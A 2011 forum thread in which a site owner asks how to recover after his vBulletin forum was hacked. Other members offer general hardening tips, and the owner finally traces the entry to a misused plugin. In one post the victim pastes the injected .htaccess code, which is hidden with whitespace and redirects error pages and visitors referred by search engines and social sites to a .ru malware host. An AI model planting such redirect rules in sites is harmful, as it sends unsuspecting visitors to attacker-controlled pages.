1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

LOL Ive Been hacked, How Do I Patch Up

Discussion in 'BlackHat Lounge' started by sapo, Dec 16, 2011.

  1. sapo

    sapo Power Member

    Joined:
    Feb 25, 2008
    Messages:
    510
    Likes Received:
    281
    my site been hacked.

    They added a simple hidden iframe in my footer of my vbulltien forum not the first time. I Usually just delete it and move on. But this time they attacked like crazy they changed all my .htaccess to some rewrite to some .ru site . I am asking how can they do this, i changed all my password etc.

    Well better then how, how can I fix my holes in my site, OR will I have to hire someone to go through it or something.
     
  2. scraper1

    scraper1 Regular Member

    Joined:
    May 28, 2011
    Messages:
    214
    Likes Received:
    207
    Location:
    Kontiki
    Home Page:
    Make sure you have all the updates for plugins and CMS, strong passwords (and don't re-use them), don't leave uploading scripts that can get indexed or the default install directory and scripts, make sure your desktop has a proper firewall and antivirus, use secure transmission protocols over the network like SSH, use the best encryption for your wireless network (if it's the case). These are only some ideas I can think of at the moment.

    The thing is that there are so many attacking vectors out there and so many possibilities to get owned that you must be constant vigilant and don't let your guard down.

    Even so, if the bad guys manage to get a foothold on a site hosted on the same server like yours, you still can get owned due to that weak link in the chain.
     
  3. joeyblogz

    joeyblogz Registered Member

    Joined:
    Feb 18, 2011
    Messages:
    56
    Likes Received:
    59
    Occupation:
    Web consultant
    Location:
    bucktown
    You need to find and patch the hole(s). I'd check your log files, It could be many things...hard to determine from the info you provided. Maybe restore from backup?
     
  4. sapo

    sapo Power Member

    Joined:
    Feb 25, 2008
    Messages:
    510
    Likes Received:
    281
    Fuck I Dont know what to do, Just got owned again thought I fixed everything and shit, site was only normal for about 5 minutes and bam got hit again.
     
  5. sapo

    sapo Power Member

    Joined:
    Feb 25, 2008
    Messages:
    510
    Likes Received:
    281
    LOL and fucking hostgator is hilarious said they cant help me till I remove all malware coding and get the waring this site may cause harm removed from google before they can start to diaginose what is wrong LMFAO wtf is that.
     
  6. sapo

    sapo Power Member

    Joined:
    Feb 25, 2008
    Messages:
    510
    Likes Received:
    281
    FUCK
    Code:
    aboutconvert.ru
     
  7. bwman

    bwman Power Member

    Joined:
    Sep 4, 2011
    Messages:
    737
    Likes Received:
    377
    Occupation:
    Jack of all Trades - Master of all
    Location:
    IM WORLD
    '' LOL '' you've Been hacked?

    lol
     
  8. sapo

    sapo Power Member

    Joined:
    Feb 25, 2008
    Messages:
    510
    Likes Received:
    281
    Well it aint actually funny but after all these years of having sites I never been hacked and they do it to more of a hobby site then anything.

    they keep changing my htaccess to this

    Code:
    ErrorDocument 400 http://aboutconvert.ru/kernel/index.php																														
    																														ErrorDocument 401 http://aboutconvert.ru/kernel/index.php																														
    																														ErrorDocument 403 http://aboutconvert.ru/kernel/index.php																														
    																														ErrorDocument 404 http://aboutconvert.ru/kernel/index.php																														
    																														ErrorDocument 500 http://aboutconvert.ru/kernel/index.php																														
    																																																																																																																								
    																														<IfModule mod_rewrite.c>																														
    																														RewriteEngine On																														
    																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing)\.(.*)																														
    																														RewriteRule ^(.*)$ http://aboutconvert.ru/kernel/index.php [R=301,L]																														
    																														RewriteCond %{HTTP_REFERER} ^.*(dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|metabot|dmoz|euroseek|about|icq)\.(.*)																														
    																														RewriteRule ^(.*)$ http://aboutconvert.ru/kernel/index.php [R=301,L]																														
    																														</IfModule>	
     
  9. izzaboo

    izzaboo Newbie

    Joined:
    Dec 17, 2011
    Messages:
    0
    Likes Received:
    0
    Take a look at the encoding and filesize of the .htaccess files.

    I don't know what it was or how it got in but I seem to have had some luck (so far, knock on wood) with deleting .htaccess files and writing new ones.

    We'll see how long it lasts...
     
  10. Kickflip

    Kickflip BANNED BANNED

    Joined:
    Jan 29, 2010
    Messages:
    2,038
    Likes Received:
    2,465
    Do you have all legal and paid for copies of the scripts/software you are using?
     
  11. sapo

    sapo Power Member

    Joined:
    Feb 25, 2008
    Messages:
    510
    Likes Received:
    281
    yes I do, I have pinned point where it they comming in from, it was a plugin poorly written or I guess good but I was not using it for the version it was intented to be used on, so I disabled that directory and deleted the plugin. changed all password fixxed all .htaccess files, and everything seem back to normal. fucking 18 hours later NO SLEEP but was worth it I love this site.